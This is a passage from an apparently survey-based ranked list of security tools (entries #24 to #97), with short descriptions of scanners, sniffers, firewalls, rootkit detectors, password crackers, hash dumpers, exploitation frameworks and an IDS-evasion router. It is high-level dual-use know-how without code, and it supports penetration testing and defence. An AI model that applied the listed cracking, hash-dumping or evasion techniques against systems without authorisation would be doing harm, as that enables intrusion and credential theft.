Netfilter is a powerful packet filter implemented in the standard Linux kernel. The userspace iptables tool is used for configuration. It now supports packet filtering (stateless or stateful), all kinds of network address and port translation (NAT/NAPT), and multiple API layers for 3rd party extensions. It includes many different modules for handling unruly protocols such as FTP. For other UNIX platforms, see Openbsd PF (OpenBSD specific), or IP Filter. Many personal firewalls are available for Windows (Tiny,Zone Alarm, Norton, Kerio, ...), though none made this list. Microsoft included a very basic firewall in Windows XP SP2, and will nag you incessantly until you install it. See all firewalls

#24
new
Windows
Command-line interface
GUI Interface
Sysinternals : An extensive collection of powerful windows utilities
Sysinternals provides many small windows utilities that are quite useful for low-level windows hacking. Some are free of cost and/or include source code, while others are proprietary. Survey respondents were most enamored with:
  • ProcessExplorer for keeping an eye on the files and directories open by any process (like LSoF on UNIX).
  • PsTools for managing (executing, suspending, killing, detailing) local and remote processes.
  • Autoruns for discovering what executables are set to run during system boot up or login.
  • RootkitRevealer for detecting registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit.
  • TCPView, for viewing TCP and UDP traffic endpoints used by each process (like Netstat on UNIX).
Update: Microsoft acquired Sysinternals in July 2006, promising that “Customers will be able to continue building on Sysinternals' advanced utilities, technical information and source code”. Less than four months later, Microsoft removed most of that source code. Future product direction is uncertain. See all rootkit detectors


#25
5
  TITLE=
Windows
GUI Interface
Retina : Commercial vulnerability assessment scanner by eEye
Like Nessus, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by eEye, who are well known for their security research. See all vulnerability scanners



#26
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Perl / Python / Ruby : Portable, general-purpose scripting languages
While many canned security tools are available on this site for handling common tasks, scripting languages allow you to write your own (or modify existing ones) when you need something more custom. Quick, portable scripts can test, exploit, or even fix systems. Archives like CPAN are filled with modules such as Net::RawIP and protocol implementations to make your tasks even easier.

#27
8
  TITLE=
Windows
GUI Interface
L0phtcrack : Windows password auditing and recovery application
L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives, consider Ophcrack, Cain and Abel, or John the Ripper. See all password crackers

#28
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Scapy : Interactive packet manipulation tool
Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. See all packet crafting tools

#29
16
Windows
GUI Interface
Sam Spade : Freeware Windows network query tool
Sam Spade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more. Non-Windows users can enjoy online versions of many of their tools.

#30
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
GnuPG / PGP : Secure your files and communication w/advanced encryption
PGP is the famous encryption program by Phil Zimmerman which helps secure your data from eavesdroppers and other risks. GnuPG is a very well-regarded open source implementation of the PGP standard (the actual executable is named gpg). While GnuPG is always free, PGP costs money for some uses. See all encryption tools

#31
3
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Airsnort : 802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack. See all wireless tools, and password crackers

#32
new
Linux
Command-line interface
GUI Interface
Source code
BackTrack : An Innovative Penetration Testing live Linux distribution
This excellent bootable live-CD Linux distribution comes from the merger of Whax and Auditor. It boasts a huge variety of Security and Forensics tools and provides a rich development environment. User modularity is emphasized so the distribution can be easily customized by the user to include personal scripts, additional tools, customized kernels, etc. See all security-oriented operating systems

#33
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
P0f : A versatile passive OS fingerprinting tool
P0f is able to identify the operating system of a target host simply by examining captured packets even when the device in question is behind an overzealous packet firewall. P0f does not generate ANY additional network traffic, direct or indirect. No name lookups, no mysterious probes, no ARIN queries, nothing. In the hands of advanced users, P0f can detect firewall presence, NAT use, existence of load balancers, and more! See all OS detection tools

#34
new
Linux
*BSD
OS X
Windows
GUI Interface
Google : Everyone's Favorite Search Engine
While it is far more than a security tool, Google's massive database is a good mind for security researchers and penetration testers. You can use it to dig up information about a target company by using directives such as “site:target-domain.com” and find employee names, sensitive information that they wrongly thought was hidden, vulnerable software installations, and more. Similarly, when a bug is found in yet another popular webapp, Google can often provide a list of vulnerable servers worldwide within seconds. The master of Google hacking is Johny Long. Check out his Google Hacking Database or his excellent book: Google Hacking for Penetration Testers.

#35
new
Linux
*BSD
OS X
Windows
GUI Interface
Source code
WebScarab : A framework for analyzing applications that communicate using the HTTP and HTTPS protocols
In its simplest form, WebScarab records the conversations (requests and responses) that it observes, and allows the operator to review them in various ways. WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented. See all web vulnerability scanners

#36
3
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Ntop : A network traffic usage monitor
Ntop shows network usage in a way similar to what top does for processes. In interactive mode, it displays the network status on the user's terminal. In Web mode, it acts as a Web server, creating an HTML dump of the network status. It sports a NetFlow/sFlow emitter/collector, an HTTP-based client interface for creating ntop-centric monitoring applications, and RRD for persistently storing traffic statistics. See all packet sniffers, and traffic monitoring tools

#37
22
  TITLE=
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Tripwire : The grand-daddy of file integrity checkers
A file and directory integrity checker. Tripwire is a tool that aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. Traditionally an open souce tool, Tripwire Corp is now focused on their commercial enterprise configuration control offerings. An open source Linux version can still be found at SourceForge. UNIX users may also want to consider AIDE, which has been designed to be a free Tripwire replacement. Or you may wish to investigate Radmind, RKHunter, or chkrootkit. Windows users may like RootkitRevealer from Sysinternals. See all rootkit detectors

#38
3
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Ngrep : Convenient packet matching & display
ngrep strives to provide most of GNU grep's common features, applying them to the network layer. ngrep is a pcap-aware tool that will allow you to specify extended regular or hexadecimal expressions to match against data payloads of packets. It currently recognizes TCP, UDP and ICMP across Ethernet, PPP, SLIP, FDDI, Token Ring and null interfaces, and understands bpf filter logic in the same fashion as more common packet sniffing tools, such as tcpdump and snoop. See all packet sniffers, and traffic monitoring tools

#39
10
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Nbtscan : Gathers NetBIOS info from Windows networks
NBTscan is a program for scanning IP networks for NetBIOS name information (similar to what the Windows nbtstat tool provides against single hosts). It sends a NetBIOS status query to each address in a supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address. The original nbtscan was written by Alla Bezroutchko. Steve Friedl has written an alternate implementation. See all application-specific scanners

#40
new
  TITLE=
Windows
GUI Interface
WebInspect : A Powerful Web Application Scanner
SPI Dynamics' WebInspect application security assessment tool helps identify known and unknown vulnerabilities within the Web application layer. WebInspect can also help check that a Web server is configured properly, and attempts common web attacks such as parameter injection, cross-site scripting, directory traversal, and more. See all web vulnerability scanners

#41
3
Linux
*BSD
OS X
Windows
Command-line interface
Source code
OpenSSL : The premier SSL/TLS encryption library
The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and open source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The project is managed by a worldwide community of volunteers that use the Internet to communicate, plan, and develop the OpenSSL toolkit and its related documentation. See all encryption tools

#42
9
Linux
*BSD
OS X
Command-line interface
Source code
Xprobe2 : Active OS fingerprinting tool
XProbe is a tool for determining the operating system of a remote host. They do this using some of the same techniques as Nmap as well as some of their own ideas. Xprobe has always emphasized the ICMP protocol in its fingerprinting approach. See all OS detection tools

#43
21
Linux
*BSD
OS X
GUI Interface
Source code
EtherApe : EtherApe is a graphical network monitor for Unix modeled after etherman
Featuring link layer, IP and TCP modes, EtherApe displays network activity graphically with a color coded protocols display. Hosts and links change in size with traffic. It supports Ethernet, FDDI, Token Ring, ISDN, PPP and SLIP devices. It can filter traffic to be shown, and can read traffic from a file as well as live from the network. See all packet sniffers, and traffic monitoring tools

#44
new
  TITLE=
Windows
GUI Interface
Core Impact : An automated, comprehensive penetration testing product
Core Impact isn't cheap (be prepared to spend tens of thousands of dollars), but it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes. If you can't afford Impact, take a look at the cheaper Canvas or the excellent and free Metasploit Framework. Your best bet is to use all three. See all vulnerability scanners, and vulnerability exploitation tools

#45
new
  TITLE=
Linux
Windows
GUI Interface
Source code
IDA Pro : A Windows or Linux disassembler and debugger
Disassembly is a big part of security research. It will help you dissect that Microsoft patch to discover the silently fixed bugs they don't tell you about, or more closely examine a server binary to determine why your exploit isn't working. Many disassemblers are available, but IDA Pro has become the de-facto standard for the analysis of hostile code and vulnerability research. This interactive, programmable, extensible, multi-processor disassembler now supports Linux (console mode) as well as Windows. See all disassemblers

#46
12
  TITLE=
Windows
GUI Interface
SolarWinds : A plethora of network discovery/monitoring/attack tools
SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more. See all traffic monitoring tools, and password crackers

#47
6
Windows
Command-line interface
Source code
Pwdump : A window password recovery tool
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file. See all password crackers

#48
7
Linux
*BSD
OS X
Command-line interface
Source code
LSoF : LiSt Open Files
This Unix-specific diagnostic and forensics tool lists information about any files that are open by processes currently running on the system. It can also list communications sockets open by each process. For a Windows equivalent, check out Process Explorer from Sysinternals.

#49
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
RainbowCrack : An Innovative Password Hash Cracker
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. See all password crackers

#50
19
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Firewalk : Advanced traceroute
Firewalk employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL filters and map networks. This classic tool was rewritten from scratch in October 2002. Note that much or all of this functionality can also be performed by the Hping2 --traceroute option. See all traceroute tools
#51
new
Linux
OS X
Windows
Command-line interface
GUI Interface
Source code
Angry IP Scanner : IP address and port scanner
Angry IP Scanner is a small open source Java application which performs host discovery ("ping scan") and port scans. The old 2.x release was Windows-only, but the new 3.X series runs on Linux, Mac, or Windows as long as Java is installed. Version 3.X omits the vampire zebra logo. As with all connect()-based scanners, performance on Windows XP SP2 and Vista can be poor due to limitations added to tcpip.sys. The Angry FAQ provides details and workarounds. A short review was posted to nmap-dev. See all port scanners

#52
new
Linux
*BSD
Command-line interface
Source code
RKHunter : An Unix Rootkit Detector
RKHunter is scanning tool that checks for signs of various pieces of nasty software on your system like rootkits, backdoors and local exploits. It runs many tests, including MD5 hash comparisons, default filenames used by rootkits, wrong file permissions for binaries, and suspicious strings in LKM and KLD modules. See all rootkit detectors

#53
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Ike-scan : VPN detector/scanner
Ike-scan exploits transport characteristics in the Internet Key Exchange (IKE) service, the mechanism used by VPNs to establish a connection between a server and a remote client. It scans IP addresses for VPN servers by sending a specially crafted IKE packet to each host within a network. Most hosts running IKE will respond, identifying their presence. The tool then remains silent and monitors retransmission packets. These retransmission responses are recorded, displayed and matched against a known set of VPN product fingerprints. Ike-scan can VPNs from manufacturers including Checkpoint, Cisco, Microsoft, Nortel, and Watchguard. See all application-specific scanners

#54
21
Linux
*BSD
OS X
Command-line interface
Source code
Arpwatch : Keeps track of ethernet/IP address pairings and can detect certain monkey business
Arpwatch is the classic ARP man-in-the-middle attack detector from LBNL's Network Research Group. It syslogs activity and reports certain changes via email. Arpwatch uses LibPcap to listen for ARP packets on a local ethernet interface.

#55
new
OS X
GUI Interface
Source code
KisMAC : A A GUI passive wireless stumbler for Mac OS X
This popular stumbler for Mac OS X offers many of the features of its namesake Kismet, though the codebase is entirely different. Unlike console-based Kismet, KisMAC offers a pretty GUI and was around before Kismet was ported to OS X. It also offers mapping, Pcap-format import and logging, and even some decryption and deauthentication attacks. See all wireless tools, and packet sniffers

#56
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
OSSEC HIDS : An Open Source Host-based Intrusion Detection System
OSSEC HIDS performs log analysis, integrity checking, rootkit detection, time-based alerting and active response. In addition to its IDS functionality, it is commonly used as a SEM/SIM solution. Because of its powerful log analysis engine, ISPs, universities and data centers are running OSSEC HIDS to monitor and analyze their firewalls, IDSs, web servers and authentication logs. See all intrusion detection systems

#57
4
*BSD
Command-line interface
Source code
Openbsd PF : The OpenBSD Packet Filter
Like Netfilter and IP Filter on other platforms, OpenBSD users love PF, their firewall tool. It handles network address translation, normalizing TCP/IP traffic, providing bandwidth control, and packet prioritization. It also offers some eccentric features, such as passive OS detection. Coming from the same guys who created OpenBSD, you can trust that it has been well audited and coded to avoid the sort of security holes we have seen in other  packet  filters. See all firewalls

#58
18
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Nemesis : Packet injection simplified
The Nemesis Project is designed to be a commandline-based, portable human IP stack for UNIX/Linux (and now Windows!). The suite is broken down by protocol, and should allow for useful scripting of injected packet streams from simple shell scripts. If you enjoy Nemesis, you might also want to look at Hping2 as they complement each other well. See all packet crafting tools

#59
new
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Tor : An anonymous Internet communication system
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, irc, ssh, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features. For a free cross-platform GUI, users recommend Vidalia See all encryption tools

#60
new
Linux
Command-line interface
GUI Interface
Source code
Knoppix : A general-purpose bootable live system on CD or DVD
Knoppix consists of a representative collection of GNU/Linux software, automatic hardware detection, and support for many graphics cards, sound cards, SCSI and USB devices and other peripherals. KNOPPIX can be used as a productive Linux system for the desktop, educational CD, rescue system, or as many nmap survey takers attest, a portable security tool. For a security-specific Linux distribution see BackTrack. See all security-oriented operating systems

#61
47
  TITLE=
Windows
GUI Interface
ISS Internet Scanner : Application-level vulnerability assessment
Internet Scanner started off in '92 as a tiny open source scanner by Christopher Klaus. Now he has grown ISS into a billion-dollar company with a myriad of security products. See all vulnerability scanners

#62
39
Windows
Command-line interface
Fport : Foundstone's enhanced netstat
Fport reports all open TCP/IP and UDP ports on the machine you run it on and shows what application opened each port. So it can be used to quickly identify unknown open ports and their associated applications. It only runs on Windows, but many UNIX systems now provided this information via netstat (try 'netstat -pan' on Linux). Here is a PDF-Format SANS article on using Fport and analyzing the results.

#63
new
Linux
*BSD
OS X
Command-line interface
Source code
chkrootkit : Locally checks for signs of a rootkit
chkrootkit is a flexible, portable tool that can check for many signs of rootkit intrusion on Unix-based systems. Its features include detecting binary modification, utmp/wtmp/lastlog modifications, promiscuous interfaces, and malicious kernel modules. See all rootkit detectors

#64
15
Linux
*BSD
OS X
Windows
Command-line interface
Source code
SPIKE Proxy : HTTP Hacking
Spike Proxy is an open source HTTP proxy for finding security flaws in web sites. It is part of the Spike Application Testing Suite and supports automated SQL injection detection, web site crawling, login form brute forcing, overflow detection, and directory traversal detection. See all application-specific scanners

#65
14
*BSD
Command-line interface
GUI Interface
Source code
OpenBSD : The Proactively Secure Operating System
OpenBSD is one of the only operating systems to treat security as their very highest priority. Even higher than usability in some cases. But their enviable security record speaks for itself. They also focus on stability and fight to obtain documentation for the hardware they wish to support. Perhaps their greatest achievement was creating OpenSSH. OpenBSD users also love [pf], their firewall tool. See all security-oriented operating systems

#66
new
Linux
*BSD
OS X
Command-line interface
GUI Interface
Source code
Yersinia : A multi-protocol low-level attack tool
Yersinia is a low-level protocol attack tool useful for penetration testing. It is capable of many diverse attacks over multiple protocols, such as becoming the root role in the Spanning Tree (Spanning Tree Protocol), creating virtual CDP (Cisco Discovery Protocol) neighbors, becoming the active router in a HSRP (Hot Standby Router Protocol) scenario, faking DHCP replies, and other low-level attacks. See all packet crafting tools

#67
new
Linux
*BSD
Command-line interface
GUI Interface
Source code
Nagios : An open source host, service and network monitoring program
Nagios is a system and network monitoring application. It watches hosts and services that you specify, alerting you when things go bad and when they get better. Some of its many features include monitoring of network services (smtp, pop3, http, nntp, ping, etc.), monitoring of host resources (processor load, disk usage, etc.), and contact notifications when service or host problems occur and get resolved (via email, pager, or user-defined method). See all traffic monitoring tools

#68
20
Linux
*BSD
Command-line interface
Source code
Fragroute/Fragrouter : A network intrusion detection evasion toolkit
Fragrouter is a one-way fragmenting router - IP packets get sent from the attacker to the Fragrouter, which transforms them into a fragmented data stream to forward to the victim. Many network IDS are unable or simply don't bother to reconstruct a coherent view of the network data (via IP fragmentation and TCP stream reassembly), as discussed in this classic paper. Fragrouter helps an attacker launch IP-based attacks while avoiding detection. It is part of the NIDSbench suite of tools by Dug Song. Fragroute is a similar tool which is also by Dug Song. See all intrusion detection systems

#69
new
Windows
GUI Interface
X-scan : A general scanner for scanning network vulnerabilities
A multi-threaded, plug-in-supported vulnerability scanner. X-Scan includes many features, including full NASL support, detecting service types, remote OS type/version detection, weak user/password pairs, and more. You may be able to find newer versions available here if you can deal with most of the page being written in Chinese. See all vulnerability scanners

#70
60
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Whisker/libwhisker : Rain.Forest.Puppy's CGI vulnerability scanner and library
Libwhisker is a Perl module geared geared towards HTTP testing. It provides functions for testing HTTP servers for many known security holes, particularly the presence of dangerous CGIs. Whisker is a scanner that used libwhisker but is now deprecated in favor of Nikto which also uses libwhisker. See all web vulnerability scanners

#71
new
Linux
*BSD
OS X
Command-line interface
Source code
Socat : A relay for bidirectional data transfer
A utility similar to the venerable Netcat that works over a number of protocols and through a files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections. See all Netcats

#72
46
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Sara : Security Auditor's Research Assistant
SARA is a vulnerability assessment tool derived from the infamous (at least in 1995) SATAN scanner. They ceased development after releasing version 7.9.1 in June 2009. See all vulnerability scanners

#73
new
  TITLE=
GUI Interface
QualysGuard : A web-based vulnerability scanner
Delivered as a service over the Web, QualysGuard eliminates the burden of deploying, maintaining, and updating vulnerability management software or implementing ad-hoc security applications. Clients securely access QualysGuard through an easy-to-use Web interface. QualysGuard features 5,000+ unique vulnerability checks, an Inference-based scanning engine, and automated daily updates to the QualysGuard vulnerability KnowledgeBase. See all vulnerability scanners

#74
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
ClamAV : A GPL anti-virus toolkit for UNIX
ClamAV is a powerful AntiVirus scanner focused towards integration with mail servers for attachment scanning. It provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via the Internet. Clam AntiVirus is based on a shared library distributed with the Clam AntiVirus package, which you can use with your own software. Most importantly, the virus database is kept up to date.

#75
8
Linux
*BSD
OS X
GUI Interface
Source code
cheops / cheops-ng : Gives a simple interface to many network utilities, maps local or remote networks and identifies OS of machines
Cheops provides the functionality of many network utilities through a comfortable, powerful GUI. It has host/network discovery functionality as well as OS detection of hosts. Cheops-ng has the ability to probe hosts to see what services they are running. On some services, cheops-ng is actually able to see what program is running for a service and the version number of that program. The original Cheops program is currently not being developed or maintained so users are advised to use cheops-ng.
#76
new
Linux
OS X
Windows
GUI Interface
Burpsuite : An integrated platform for attacking web applications
Burp suite allows an attacker to combine manual and automated techniques to enumerate, analyze, attack and exploit web applications. The various burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another. See all web vulnerability scanners

#77
32
Windows
GUI Interface
Brutus : A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra. See all password crackers

#78
new
Linux
*BSD
Command-line interface
Source code
Unicornscan : Not your mother's port scanner
Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses. Like Scanrand, it isn't for the faint of heart. See all port scanners

#79
33
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Stunnel : A general-purpose SSL cryptographic wrapper
The stunnel program is designed to work as an SSL encryption wrapper between remote client and local (inetd-startable) or remote server. It can be used to add SSL functionality to commonly used inetd daemons like POP2, POP3, and IMAP servers without any changes in the programs' code. It will negotiate an SSL connection using the OpenSSL or SSLeay libraries. See all encryption tools

#80
37
Linux
*BSD
Command-line interface
Source code
Honeyd : Your own personal honeynet
Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their TCP personality can be adapted so that they appear to be running certain versions of operating systems. Honeyd enables a single host to claim multiple addresses on a LAN for network simulation. It is possible to ping the virtual machines, or to traceroute them. Any type of service on the virtual machine can be simulated according to a simple configuration file. It is also possible to proxy services to another machine rather than simulating them. It has many library dependencies, which can make compiling/installing Honeyd difficult.

#81
25
Linux
*BSD
OS X
Command-line interface
Source code
Fping : A parallel ping scanning program
fping is a ping(1) like program which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up. fping is different from ping in that you can specify any number of hosts on the command line, or specify a file containing the lists of hosts to ping. Instead of trying one host until it timeouts or replies, fping will send out a ping packet and move on to the next host in a round-robin fashion. If a host replies, it is noted and removed from the list of hosts to check. If a host does not respond within a certain time limit and/or retry limit it will be considered unreachable.

#82
new
Linux
*BSD
OS X
Windows
GUI Interface
Source code
BASE : The Basic Analysis and Security Engine
BASE is a PHP-based analysis engine to search and process a database of security events generated by various IDSs, firewalls, and network monitoring tools. Its features include a query-builder and search interface for finding alerts matching different patterns, a packet viewer/decoder, and charts and statistics based on time, sensor, signature, protocol, IP address, etc. See all intrusion detection systems

#83
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Argus : A generic IP network transaction auditing tool
Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information. See all traffic monitoring tools

#84
new
Windows
GUI Interface
Source code
Wikto : Web Server Assessment Tool
Wikto is a tool that checks for flaws in webservers. It provides much the same functionality as Nikto but adds various interesting pieces of functionality, such as a Back-End miner and close Google integration. Wikto is written for the MS .NET environment and registration is required to download the binary and/or source code. See all web vulnerability scanners

#85
new
Linux
*BSD
OS X
Windows
GUI Interface
Source code
Sguil : The Analyst Console for Network Security Monitoring
Sguil (pronounced sgweel) is built by network security analysts for network security analysts. Sguil's main component is an intuitive GUI that provides realtime events from Snort/barnyard. It also includes other components which facilitate the practice of Network Security Monitoring and event driven analysis of IDS alerts. See all intrusion detection systems

#86
39
Linux
*BSD
Command-line interface
Source code
Scanrand : An unusually fast stateless network service and topology discovery system
Scanrand is a stateless host-discovery and port-scanner similar in design to Unicornscan. It trades off reliability for amazingly fast speeds and uses cryptographic techniques to prevent attackers from manipulating scan results. This utility is a part of a software package called Paketto Keiretsu, which was written by Dan Kaminsky. Scanrand and Paketto are no longer actively maintained, but the latest released version can still be found at DoxPara.Com. See all port scanners

#87
new
Linux
*BSD
Command-line interface
Source code
IP Filter : Portable UNIX Packet Filter
IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services. It can either be used as a loadable kernel module or incorporated into your UNIX kernel; use as a loadable kernel module where possible is highly recommended. Scripts are provided to install and patch system files, as required. IP Filter is distributed with FreeBSD, NetBSD, and Solaris. OpenBSD users should see Openbsd PF and Linux users Netfilter. See all firewalls

#88
new
  TITLE=
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Canvas : A Comprehensive Exploitation Framework
Canvas is a commercial vulnerability exploitation tool from Dave Aitel's ImmunitySec. It includes more than 150 exploits and is less expensive than Core Impact, though it still costs thousands of dollars. You can also buy the optional VisualSploit Plugin for drag and drop GUI exploit creation. Zero-day exploits can occasionally be found within Canvas. See all vulnerability exploitation tools

#89
new
  TITLE=
Linux
Windows
GUI Interface
VMware : Multi-platform Virtualization Software
VMware virtualization software lets you run one operating system within another. This is quite useful for security researchers who commonly need to test code, exploits, etc on multiple platforms. It only runs on Windows and Linux as the host OS, but pretty much any x86 OS will run inside the virtualized environment. It is also useful for setting up sandboxes. You can browse from within a VMware window so the even if you are infected with malware, it cannot reach your host OS. And recovering the guest OS is as simple as loading a "snapshot" from prior to the infection. VMware player (executes, but can't create OS images) and VMWare Server (partitions a physical server machine into multiple virtual machines) were recently released for free. Another interesting virtualization system (Linux focused) is Xen.

#90
31
Linux
*BSD
OS X
Command-line interface
Source code
Tcptraceroute : A traceroute implementation using TCP packets
The problem is that with the widespread use of firewalls on the modern Internet, many of the packets that the conventional traceroute(8) sends out (ICMP echo or UDP) end up being filtered, making it impossible to completely trace the path to the destination. However, in many cases, these firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections on. By sending out TCP SYN packets instead of UDP or ICMP ECHO packets, tcptraceroute is able to bypass the most common firewall filters. See all traceroute tools

#91
67
  TITLE=
Linux
*BSD
OS X
GUI Interface
Source code
SAINT : Security Administrator's Integrated Network Tool
SAINT is another commercial vulnerability assessment tool (like Nessus, ISS Internet Scanner, or Retina). It runs on UNIX and used to be free and open source, but is now a commercial product. See all vulnerability scanners

#92
new
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
OpenVPN : A full-featured SSL VPN solution
OpenVPN is an open-source SSL VPN package which can accommodate a wide range of configurations, including remote access, site-to-site VPNs, WiFi security, and enterprise-scale remote access solutions with load balancing, failover, and fine-grained access-controls. OpenVPN implements OSI layer 2 or 3 secure network extension using the industry standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or 2-factor authentication, and allows user or group-specific access control policies using firewall rules applied to the VPN virtual interface. OpenVPN uses OpenSSL as its primary cryptographic library. See all encryption tools

#93
new
Windows
GUI Interface
OllyDbg : An assembly level Windows debugger
OllyDbg is a 32-bit assembler level analyzing debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. OllyDbg features an intuitive user interface, advanced code analysis capable of recognizing procedures, loops, API calls, switches, tables, constants and strings, an ability to attach to a running program, and good multi-thread support. OllyDbg is free to download and use but no source code is provided. See all disassemblers

#94
new
Linux
Command-line interface
GUI Interface
Source code
Helix : A Linux Distribution with Computer Forensics in Mind
Helix is a customized distribution of the Knoppix Live Linux CD. Helix is more than just a bootable live CD. You can still boot into a customized Linux environment that includes customized Linux kernels, excellent hardware detection and many applications dedicated to Incident Response and Forensics. Helix has been designed very carefully to NOT touch the host computer in any way and it is forensically sound. Helix will not auto mount swap space, or auto mount any attached devices. Helix also has a special Windows autorun side for Incident Response and Forensics. See all security-oriented operating systems

#95
38
Linux
OS X
Command-line interface
Source code
Bastille : Security hardening script for Linux, Mac OS X, and HP-UX
The Bastille Hardening program "locks down" an operating system, proactively configuring the system for increased security and decreasing its susceptibility to compromise. Bastille can also assess a system's current state of hardening, granularly reporting on each of the security settings with which it works. Bastille currently supports the Red Hat (Fedora Core, Enterprise, and Numbered/Classic), SUSE, Debian, Gentoo, and Mandrake distributions, along with HP-UX and Mac OS X. Bastille's focuses on letting the system's user/administrator choose exactly how to harden the operating system. In its default hardening mode, it interactively asks the user questions, explains the topics of those questions, and builds a policy based on the user's answers. It then applies the policy to the system. In its assessment mode, it builds a report intended to teach the user about available security settings as well as inform the user as to which settings have been tightened. See all security-oriented operating systems

#96
new
  TITLE=
Windows
Command-line interface
GUI Interface
Acunetix WVS : Commercial Web Vulnerability Scanner
Acunetix WVS automatically checks web applications for vulnerabilities such as SQL Injections, cross site scripting, arbitrary file creation/deletion, weak password strength on authentication pages. AcuSensor technology detects vulnerabilities which typical black box scanners miss. Acunetix WVS boasts a comfortable GUI, an ability to create professional security audit and compliance reports, and tools for advanced manual webapp testing. See all web vulnerability scanners

#97
new
Linux
